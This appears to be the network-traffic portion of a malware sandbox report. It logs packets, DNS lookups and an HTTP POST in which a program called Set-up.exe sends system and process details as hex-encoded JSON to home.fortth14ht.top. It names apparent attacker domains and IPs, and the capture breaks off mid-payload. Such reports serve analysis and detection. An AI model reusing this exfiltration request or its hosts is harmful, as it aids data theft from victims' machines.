Dec 28, 2024 09:33:30.165025949 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165036917 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165105104 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165115118 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165158033 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165167093 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165210962 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165278912 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165333033 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165390015 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165416956 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165477991 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165528059 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165544987 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165643930 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165653944 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.165658951 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:35.191478014 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:35.191546917 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:35.191667080 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:35.221055031 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:35.221102953 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:36.173595905 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:36.173652887 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:36.173729897 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:36.173957109 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:36.293440104 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:36.331926107 CET	49739	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:36.451487064 CET	80	49739	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:36.451733112 CET	49739	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:36.451956987 CET	49739	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:36.486852884 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:36.486952066 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:36.491030931 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:36.491060972 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:36.491508961 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:36.533962965 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:36.572480917 CET	80	49739	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:36.592473030 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:36.592499018 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:36.592657089 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:38.914484024 CET	80	49739	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:38.914509058 CET	80	49739	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:38.914567947 CET	49739	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:38.914830923 CET	49739	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:39.034284115 CET	80	49739	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:39.063455105 CET	49740	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:39.183147907 CET	80	49740	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:39.183238983 CET	49740	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:39.183497906 CET	49740	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:39.302953959 CET	80	49740	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:40.774625063 CET	80	49740	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:40.774768114 CET	80	49740	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:40.774821043 CET	49740	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:40.774929047 CET	49740	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:40.894509077 CET	80	49740	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:56.739325047 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:56.739423037 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:56.739485025 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:56.758080006 CET	49737	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:56.758111000 CET	443	49737	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:56.772314072 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:56.772387028 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:56.772484064 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:56.772876978 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:56.772897005 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.029063940 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.029226065 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.033941984 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.033955097 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.034250975 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.054164886 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.054202080 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.054302931 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.800940990 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.801017046 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.801057100 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.801075935 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.801090002 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.801103115 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.801139116 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.803957939 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.804016113 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.804028034 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.812206984 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.812318087 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.812330961 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.820506096 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.820564985 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.820583105 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.862262964 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.920547962 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:58.971652985 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:58.971693039 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:59.005580902 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:59.005625010 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:59.005697966 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:59.005712032 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:59.005727053 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:59.005773067 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:59.005801916 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:59.006005049 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:59.006023884 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:59.006042004 CET	49741	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:59.006047010 CET	443	49741	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:59.193862915 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:59.193952084 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:33:59.194029093 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:59.194346905 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:33:59.194376945 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:00.455219030 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:00.455322027 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:00.457129955 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:00.457142115 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:00.457413912 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:00.458580971 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:00.458749056 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:00.458786964 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:00.458873034 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:00.458880901 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:01.446429014 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:01.446525097 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:01.446624994 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:01.446777105 CET	49742	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:01.446805954 CET	443	49742	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:01.556329012 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:01.556406021 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:01.556499958 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:01.556883097 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:01.556902885 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:02.816379070 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:02.816452026 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:02.818104029 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:02.818109989 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:02.818407059 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:02.819655895 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:02.819772959 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:02.819806099 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:03.735380888 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:03.735486984 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:03.735553026 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:03.735745907 CET	49743	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:03.735764980 CET	443	49743	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:04.053704977 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:04.053769112 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:04.053853035 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:04.054279089 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:04.054285049 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:05.267858028 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:05.267952919 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:05.269292116 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:05.269304037 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:05.269561052 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:05.270870924 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:05.271048069 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:05.271080017 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:05.271332026 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:05.271341085 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:06.205099106 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:06.205246925 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:06.205338955 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:06.205478907 CET	49744	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:06.205498934 CET	443	49744	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:06.409842968 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:06.409912109 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:06.409975052 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:06.410305977 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:06.410326004 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:07.623208046 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:07.623320103 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:07.624641895 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:07.624655962 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:07.624921083 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:07.626200914 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:07.626296043 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:07.626302958 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:08.468226910 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:08.468344927 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:08.468401909 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:08.468553066 CET	49745	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:08.468575001 CET	443	49745	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:08.782828093 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:08.782876015 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:08.782996893 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:08.783293009 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:08.783308029 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:09.995421886 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:09.995548964 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:09.996809959 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:09.996826887 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:09.997072935 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:09.998596907 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:09.999278069 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:09.999308109 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:09.999432087 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:09.999459982 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:09.999573946 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:09.999603987 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:09.999742031 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:09.999780893 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:09.999948978 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:09.999989033 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:10.000152111 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.000190973 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:10.000200033 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.000217915 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:10.000385046 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.000420094 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:10.000442982 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.000576019 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.000621080 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.043343067 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:10.043565035 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.043618917 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.043642998 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.091336966 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:10.091434956 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:10.139333010 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:12.297753096 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:12.297866106 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:12.298001051 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:12.298161983 CET	49747	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:12.298182964 CET	443	49747	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:12.301430941 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:12.301474094 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:12.301681995 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:12.301842928 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:12.301856041 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:13.558530092 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:13.558666945 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:13.559942007 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:13.559954882 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:13.560199022 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:13.561542988 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:13.561561108 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:13.561609030 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.403045893 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.403094053 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.403121948 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.403184891 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.403196096 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:14.403215885 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.403266907 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:14.403270006 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.403287888 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.403331995 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:14.407386065 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.408623934 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:14.408634901 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.415153027 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.417190075 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:14.417198896 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.429748058 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.429905891 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.429972887 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:14.430114985 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:14.430114985 CET	49754	443	192.168.2.4	172.67.128.184
Dec 28, 2024 09:34:14.430140972 CET	443	49754	172.67.128.184	192.168.2.4
Dec 28, 2024 09:34:14.430152893 CET	443	49754	172.67.128.184	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:33:14.361778975 CET	52149	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:14.366281986 CET	52149	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:14.506880999 CET	53	52149	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:14.657957077 CET	53	52149	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:21.191634893 CET	58534	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:21.420614958 CET	53	58534	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:28.177090883 CET	58535	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:28.177155972 CET	58535	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:28.317101002 CET	53	58535	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:28.582254887 CET	53	58535	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:35.037051916 CET	53905	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:35.180514097 CET	53	53905	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:36.184859037 CET	53906	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:36.184921980 CET	53906	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:36.331062078 CET	53	53906	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:36.331084013 CET	53	53906	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:38.921946049 CET	53908	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:38.922015905 CET	53908	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:33:39.062757969 CET	53	53908	1.1.1.1	192.168.2.4
Dec 28, 2024 09:33:39.062920094 CET	53	53908	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:33:14.361778975 CET	192.168.2.4	1.1.1.1	0x120e	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:14.366281986 CET	192.168.2.4	1.1.1.1	0x68f9	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 28, 2024 09:33:21.191634893 CET	192.168.2.4	1.1.1.1	0x5c4	Standard query (0)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:28.177090883 CET	192.168.2.4	1.1.1.1	0x6bc4	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:28.177155972 CET	192.168.2.4	1.1.1.1	0x74ea	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:33:35.037051916 CET	192.168.2.4	1.1.1.1	0x7b8d	Standard query (0)	spuriotis.click	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:36.184859037 CET	192.168.2.4	1.1.1.1	0x55a4	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:36.184921980 CET	192.168.2.4	1.1.1.1	0xfdf9	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:33:38.921946049 CET	192.168.2.4	1.1.1.1	0x56c3	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:38.922015905 CET	192.168.2.4	1.1.1.1	0xffe3	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:33:14.657957077 CET	1.1.1.1	192.168.2.4	0x120e	No error (0)	httpbin.org		3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:14.657957077 CET	1.1.1.1	192.168.2.4	0x120e	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:21.420614958 CET	1.1.1.1	192.168.2.4	0x5c4	Name error (3)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:28.317101002 CET	1.1.1.1	192.168.2.4	0x6bc4	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:35.180514097 CET	1.1.1.1	192.168.2.4	0x7b8d	No error (0)	spuriotis.click		172.67.128.184	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:35.180514097 CET	1.1.1.1	192.168.2.4	0x7b8d	No error (0)	spuriotis.click		104.21.2.51	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:36.331084013 CET	1.1.1.1	192.168.2.4	0x55a4	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:33:39.062920094 CET	1.1.1.1	192.168.2.4	0x56c3	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

spuriotis.click

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	194.87.58.92	80	7744	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:33:28.703948021 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 451311 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 33 34 30 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 